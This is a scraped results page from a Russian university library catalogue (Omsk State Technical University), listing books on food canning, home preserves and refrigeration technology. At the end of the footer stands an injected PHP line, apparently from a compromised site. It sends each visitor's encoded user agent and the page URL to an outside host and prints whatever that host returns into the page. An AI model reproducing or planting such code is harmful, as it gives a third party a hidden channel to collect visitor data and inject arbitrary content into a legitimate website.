Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

123 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Консервирование")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 62
1. 
Олейников, Филипп Георгиевич. Консервирование плодов и овощей в домашних условиях [Текст] / Ф. Г. Олейников, С. А. Бакин, 1959. - 67, [1] с.
Держатели документа (Информация об экземплярах) 
2. 
Энциклопедия семейной жизни [Текст] : в 2 т. Т. 2 : Все для мужчин / сост.: А. Р. Забродин, А. А. Немирова, 1993. - 381 с.
Держатели документа (Информация об экземплярах) 
3. 
Шашилова, Валентина Петровна. Хранение и переработка плодов и ягод [Текст] / В. П. Шашилова, В. Н. Федина, 1988. - 63, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
4. 
Поскребышева, Галина Ивановна. Заготовки без сахара [Текст] / Г. И. Поскребышева, 1993. - 31 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
5. 
Витамины круглый год [Текст] / К. С. Петровский [и др.], 1985. - 94, [2] с.
Держатели документа (Информация об экземплярах) 
6. 
Витамины круглый год [Текст] / К. С. Петровский [и др.], 1983. - 94, [2] с.
Держатели документа (Информация об экземплярах) 
7. 
Руцкий, Аркадий Владимирович. Домашние заготовки [Текст] / А. В. Руцкий, 1993. - 255, [1] с.
Держатели документа (Информация об экземплярах) 
8. 
Энциклопедия семейной жизни [Текст] : в 2 т. Т. 1 : Все для женщин / сост.: А. Р. Забродин [и др.], 1993. - 444 с.
Держатели документа (Информация об экземплярах) 
9. 
Домашняя кладовая [Текст] / сост. В. Донцов [и др.], 1993. - 429, [1] с.
Держатели документа (Информация об экземплярах) 
10. 
Деревенская кухня [Текст] / сост. Т. А. Комарова, 1992. - 79, [1] с.
Держатели документа (Информация об экземплярах) 
11. 
Головков, Анатолий Эммануилович. Разносолы деревенской кухни [Текст] / А. Э. Головков, 1992. - 239, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
12. 
Хлебников, Владимир Иванович. Технология товаров (продовольственных) [Текст] : Учеб. для вузов по специальности 061600 "Товароведение и экспертиза товаров" / В. И. Хлебников, 2000. - 426 с.
13. 
Демирова, Амият Фейзудиновна. Использование ротации для интенсификации процесса стерилизации консервов в стеклянной таре [Текст] : Автореф. дис. .. канд техн. наук: 05.18.12 / А. Ф. Демирова, 2000. - 18 с.
Держатели документа (Информация об экземплярах) 
14. 
Консервирование пищевых продуктов холодом [Текст] : (Теплофиз. основы): Учеб. пособие для вузов по специальностям "Технология консервов и пищеконцентратов", "Технология мяса и мясных продуктов", "Технология рыбы и рыбных продуктов", "Технология молока и молочных продуктов" / И. А. Рогов, В. Е. Куцакова, В. И. Филиппов, С. В. Фролов, 1999. - 174 с.
Держатели документа (Информация об экземплярах) 
15. 
Большаков, Сергей Алексеевич. Холодильная техника и технология продуктов питания [Текст] : Учеб. для вузов по специальности 351100 "Товароведение и экспертиза товаров" (по областям применения) и другим технологическим специальностям пищевого профиля по дисциплине "Холодильная техника и технология" / С. А. Большаков, 2003. - 304 с.

В учебнике содержатся сведения о назначении и устройстве холодильной техники, физических принципах получения низких температур, типах и циклах холодильных машин. Приведены основные и вспомогательные элементы холодильных установок. Даны теоретические основы холодильной технологии, методы расчета процессов холодильного консервирования, обработки и хранения сырья и продуктов питания. Рассмотрены проблемы изменений, происходящих при обработке, хранении, размораживании, транспортировании и реализации охлажденных и замороженных пищевых продуктов.

16. 
Товароведение и экспертиза потребительских товаров [Текст] : учеб. для торговых учеб. заведений / И. А. Ермилова [и др.], 2007. - 542, [1] с.

В учебнике изложены предмет и задачи, теоретические основы товароведения, классификация, химический состав, пищевая ценность отдельных групп товаров. Даны современные особенности технологии отечественных и импортных продуктов. Особое внимание уделяется сертификации и проведению экспертизы товаров растительного и животного происхождения.

17. 
Заготовки впрок [Текст], 1992. - 94, [1] с.
Держатели документа (Информация об экземплярах) 
18. 
Заготовки впрок [Текст] : домашнее консервирование / сост. Ю. Воронов, 1993. - 189 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
19. 
Котоусова, Антонина Митрофановна. Вяленые фрукты и овощи [Текст] / А. М. Котоусова, Н. Г. Котоусов, 1984. - 142, [2] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
20. 
Драмшева, Светлана Трофимовна. Теоретические основы товароведения продовольственных товаров [Текст] : Учеб. для сред. спец. учеб. заведений / С. Т. Драмшева, 1996. - 143 с.
Ключевые слова 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3104 - 09.12.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.76 с.12 запросов, 0.46c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;